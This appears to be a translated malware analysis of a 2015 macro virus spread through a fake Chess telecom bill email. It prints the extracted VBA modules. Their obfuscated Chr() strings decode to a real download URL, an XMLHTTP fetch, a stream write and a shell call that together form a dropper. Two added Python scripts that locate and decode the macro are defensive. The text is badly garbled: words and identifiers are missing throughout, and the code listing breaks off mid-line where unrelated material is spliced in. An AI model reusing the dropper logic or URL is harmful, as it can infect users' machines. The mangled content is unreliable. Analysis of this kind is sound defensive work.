1. A macro virus spread by email

A macro virus that has been circulating recently spreads by email. The mail header of a captured sample is as follows:

The content of the mail looks like this (to save space, the ellipsis marks omitted content):

Your bill

: 24583

:

Bill date: July 2015

: £17.50

How can I view my bills?

Your Chess bill is ready and for you . To check out your deta=, bills and any you’ve since your last b=ll, just sign into My your sign in ?

If you’ve your sign in , no , you can reset these b=

is easy!

If you want to make a or debit card you can do by cho=sing

You don’t need to do if you pay by debit, we will y=ur on or after 30th June. If you pay by , deta=ls of how to pay us are on the .

to Debit today and you’ll save at least £60.00 a year, s=mply call our team on 0844 770 6060.

else you’d like to know?

……

This e-mail has been sent from a to Chess , House, Heyes Lane, Edge, , SK9=7JP.

in , . Its are to the .

If you in error, Chess on

+44 (0)800 019 8900 the name of the , the

+email

which it has been sent and then it; you may not rely on i=s nor copy/ it to .

, and

of in this email are those of the and will not bind Chess Tel=com by an of this mess=ge.

We do not for ; you must scan for these.

sent to and from Chess are for , and , to and to and use of our .

Thank you for your co-.

are to terms and , VAT and are to .

E&OE

About the mail body above: the text looks quite credible, the phone numbers in it are real, and it gives a specific company name and address, and that company really exists. It is not yet known whether the company is aware that its name is being used for malicious purposes (a bit of a mouthful, but not the point...). The reason the mail is so realistic is simply that the sender hopes to lower the victim's guard.

2. Extracting the macro code

What we mainly analyse is the mail's attachment. Using the save function we can save the attachment 2015-07-Bill.docm out of the mail. Our analysis needs a tool, which can be downloaded here.

The steps to extract the macro code are as follows:

2.1 Unpacking

.exe 2015-07-Bill.docm

After unpacking, the files are saved by default under C:~1~1~1Temp (WinXP SP3 environment); the unpacked directory looks roughly like this:

│ [].xml
├─
│ app.xml
│ core.xml
├─word
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .xml
│ │ .bin
│ │ .xml
│ │
│ ├─theme
│ │ .xml
│ │
│ └─_rels
│ .xml.rels
│ .bin.rels
└─_rels

In the directory structure above you can see that the word directory contains a .bin file; this is where the macro code lives. Note that the name can be anything; it is not necessarily (the default macro file name). Next we extract the macro code from the .bin file.

2.2 Extraction

.exe .bin info

By default a folder .BIN- is created in the same directory as the .bin file, holding the individual modules of the VBA macro code. The files extracted in this case are as follows:

The files above are all VB code, just with the extension removed. The next job is to analyse the VB code and see exactly what it does.
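As an added example (not part of the original article, and not the tool the author used), the following Python script locates the VBA project part inside the .docm container by its declared content type rather than by file name. That is the point made above: the part is usually called vbaProject.bin, but it does not have to be, so a check that only looks for that name can be dodged by renaming. The .docm-like package built in memory is constructed for the demonstration and its .bin payload is a placeholder, not a real OLE project.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Content type Office assigns to the binary VBA project part, whatever the part is named.
VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"


def find_vba_parts(container: bytes) -> list[str]:
    """Return the zip entry names of every part declared as a VBA project in [Content_Types].xml."""
    found = []
    with zipfile.ZipFile(io.BytesIO(container)) as zf:
        names = set(zf.namelist())
        if "[Content_Types].xml" not in names:
            return found  # not an OOXML package
        root = ET.fromstring(zf.read("[Content_Types].xml"))
        # Explicit per-part declarations: <Override PartName="/word/x.bin" ContentType="..."/>
        for ov in root.iter(f"{{{CT_NS}}}Override"):
            if ov.get("ContentType") == VBA_CONTENT_TYPE:
                part = ov.get("PartName", "").lstrip("/")
                if part in names and part not in found:
                    found.append(part)
        # Extension-wide declarations: <Default Extension="bin" ContentType="..."/>
        for d in root.iter(f"{{{CT_NS}}}Default"):
            if d.get("ContentType") == VBA_CONTENT_TYPE:
                ext = "." + d.get("Extension", "").lower()
                found.extend(n for n in sorted(names) if n.lower().endswith(ext) and n not in found)
    return found


def build_sample_package(vba_part_name: str = "") -> bytes:
    """Constructed sample: a minimal .docm-like package. With an empty name, no VBA part is added."""
    overrides = [
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    ]
    if vba_part_name:
        overrides.append(f'<Override PartName="/{vba_part_name}" ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Types xmlns="{CT_NS}">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        + "".join(overrides) + "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if vba_part_name:
            # Placeholder bytes (OLE magic followed by text); not a real VBA project stream.
            zf.writestr(vba_part_name, b"\xd0\xcf\x11\xe0 placeholder, not a real OLE project")
    return buf.getvalue()


if __name__ == "__main__":
    # The renamed part is still found because the content type, not the name, identifies it.
    print(find_vba_parts(build_sample_package("word/invoice.bin")))
```

The part found this way is the OLE compound file that the extraction tool in step 2.2 takes apart into modules; oletools' olevba performs the same locate-and-extract sequence automatically. For triage, a document whose [Content_Types].xml declares a VBA project part under any name is worth the same scrutiny as one with a plain vbaProject.bin.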

3. Code analysis

For ease of explanation, the modules are not described in their original order.

3.1 Code analysis

The code is as follows:

1 = ""

3 init

5 Set = Forms("main")

7 = .
8 = .

10 End
11 ( As )
12 = (((, Chr(60), ""), Chr(61), ""), Chr(59), "")
13 Set = ()
14 End
15 Sub
16 On Error GoTo
17
18 = .Value
19 = ""
20 DoCmd. ,
21
22 :
23 Exit Sub
24
25 :
26 Err.
27
28
29 End Sub

Focus on lines [11-14]:

( As )
= (((, Chr(60), ""), Chr(61), ""), Chr(59), "")
Set = ()
End

The main statement in the function is (((, Chr(60), ""), Chr(61), ""), Chr(59), ""), where Chr(60), Chr(61) and Chr(59) correspond to the characters <, = and ; respectively.

0 Or Me. > 0 Then
7 Me.total = ( * Me.boxes) + Me.
8 Else
9 Me.total = Me.
10 End If
11
12 End Sub
13
14 Sub
15 If Me.boxes > 0 Then
16 Me.total = * Me.boxes
17 End If
18 End Sub
19
20 ( As , )
21 Dim : Set = ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
22
23 With
24 .Type = 1
25 .Open
26 .write
27 End With
. , 2
29 End
30 Sub
31 If Me.boxes > 0 Or Me. > 0 Then
32 Me.total = ( * Me.boxes) + Me.
33 Else
34 Me.total = Me.
35 End If
36 End Sub
37
38 Sub
39 DoCmd.Save
40 End Sub

Focus on the code segment at lines [20-29]:

( As , )
Dim : Set = ("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
With
.Type = 1
.Open
.write
End With
. , 2
End

This mainly provides a function (first parameter = byte array, second parameter = file name); its key statement is:

("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")

As you can see, this uses the decryption function analysed above (lines [11-14] of 3.1) to decrypt the encrypted string before using it. Since we already know what that function does, decrypting by hand gives:

Removing the characters "space ; < =" from it yields the real command: Adodb. . Further analysis shows that the function does the following:

Using an adodb. stream, it writes the byte array into the specified file.

Later I will provide a script to decrypt these commands and recover the real commands in the macro code.

3.3 Module analysis

1 = ""

3 As
4 As
5 As
6 As 'query base
7 As ' form name
8 As 'text field for code entry
9 As 'text field for name entry
10 As
11 As
12 colS1 As ' to
13 colS2 As ' to
14
15
16
17 'check form if they have user input
18 If Not (Forms().()) Then
19 = Forms().()
20 Else
21 = ""
22 End If
23
24 If Not (Forms().()) Then
25 = Forms().()
26 Else
27 = ""
28 End If
29
30 'main logic
31 If ( = "" And = "") Or (() And ()) Then
32 =
33 (Not () = True) And (Not () = True) Then
34 = & " WHERE " & colS1 & " LIKE '" & & "*' AND " & colS2 & " LIKE '*" & & "*'"
35 Not () Then
36 = & " WHERE " & colS1 & " LIKE '" & & "*'"
37 Not () Then
38 = & " WHERE " & colS2 & " LIKE '*" & & "*'"
39 Else
40 " to "
41 Exit
42 End If
43
44 Forms(). =
45
46 End
47 ( As )
48
49 .().Left = 720
50
51 End
52
53 Sub
54
55 = Chr(104) & Chr(116) & Chr(61) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(59) & Chr(47) & Chr(108) & Chr(97) & Chr(98) & Chr(111) & "a" & Chr(60) & Chr(117) & "d" & Chr(105) & Chr(111) & Chr(46) & Chr(61) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(52) & Chr(116) & Chr(102) & Chr(51) & Chr(51) & Chr(119) & Chr(47) & Chr(60) & Chr(119) & Chr(52) & Chr(116) & Chr(52) & Chr(53) & Chr(51) & Chr(46) & Chr(59) & "e" & Chr(61) & Chr(120) & Chr(101)
' Download method: = .
56 Set = ("M" & "i" & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & "s" & Chr(111) & "f" & Chr(116) & ";" & Chr(46) & "X" & Chr(77) & Chr(60) & "L" & Chr(59) & Chr(72) & "T" & Chr(61) & Chr(84) & "P")
57
58 = (((, Chr(60), ""), Chr(61), ""), Chr(59), "")
' Download using : . Open
59 , Chr(79) & Chr(112) & Chr(101) & Chr(110), , Chr(71) & Chr(69) & Chr(84), _
60 _
61 , False
62
' = .Shell
63 Set = (Chr(87) & "
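As an added example, and not the decryption script the author promises in 3.2 nor code from the original page, here is a Python decoder for the string obfuscation used throughout these modules: every sensitive string is assembled from Chr() calls and short literals, padded with the filler characters Chr(60) "<", Chr(61) "=" and Chr(59) ";", and the macro's helper (lines [11-14] of 3.1, reused at line 58 of 3.3) strips them with three nested Replace calls. The sample VBA lines are reconstructed from the Chr() sequences in the listings above (line 21 of the function analysed in 3.2 and lines 56 and 59 of 3.3); the CreateObject and CallByName wrappers and the variable names are my assumptions, since the listing lost those names. The decoder recovers the object names Adodb.Stream and Microsoft.XMLHTTP and the method names Open and GET; applied to line 55 it would recover the download URL in the same way.

```python
import re

# Filler characters inserted into every obfuscated string. The macro's own helper
# strips the first three with nested Replace() calls; the analysis also drops spaces.
FILLER = frozenset("<=; ")

_TOKEN = re.compile(r'Chr\((\d+)\)|"([^"]*)"')
# Two or more string tokens joined by "&", allowing a VBA line continuation (" _").
_RUN = re.compile(r'(?:Chr\(\d+\)|"[^"]*")(?:\s*&\s*(?:_\s*)?(?:Chr\(\d+\)|"[^"]*"))+')


def _normalize(vba: str) -> str:
    """Map the curly quotes that appear in copied listings back to VBA's straight quotes."""
    return vba.replace("\u201c", '"').replace("\u201d", '"')


def evaluate_concat(expr: str) -> str:
    """Evaluate an expression such as  "A" & Chr(60) & "b"  into the string VBA would build.
    Only string literals and Chr(n) are handled; that is all the sample uses."""
    out = []
    for m in _TOKEN.finditer(_normalize(expr)):
        out.append(chr(int(m.group(1))) if m.group(1) is not None else m.group(2))
    return "".join(out)


def deobfuscate(expr: str) -> str:
    """Evaluate the expression, then remove the filler characters (the Replace chain)."""
    return "".join(c for c in evaluate_concat(expr) if c not in FILLER)


def deobfuscate_all(vba_source: str) -> list[str]:
    """Find every Chr()/literal concatenation in a VBA module and return the decoded strings."""
    return [deobfuscate(m.group(0)) for m in _RUN.finditer(_normalize(vba_source))]


# Constructed sample: the Chr() sequences are those shown in the listings above;
# the CreateObject/CallByName wrappers and variable names are assumed, since the
# listing lost those identifiers.
SAMPLE_VBA = '''
Dim s: Set s = CreateObject("A" & Chr(60) & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & "m")
Set h = CreateObject("M" & "i" & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & "s" & Chr(111) & "f" & Chr(116) & ";" & Chr(46) & "X" & Chr(77) & Chr(60) & "L" & Chr(59) & Chr(72) & "T" & Chr(61) & Chr(84) & "P")
CallByName h, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
    url, False
'''

if __name__ == "__main__":
    for decoded in deobfuscate_all(SAMPLE_VBA):
        print(decoded)
```

Run over a whole extracted module, deobfuscate_all lists every rebuilt string in order of appearance, which is usually enough to read the download-and-execute flow (Microsoft.XMLHTTP Open GET, Adodb.Stream write, then the shell object at line 63) without stepping through the macro. Because the filler set is taken from the Replace chain the macro itself uses, a sample that changes those three Chr() codes needs only FILLER updated.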

———END———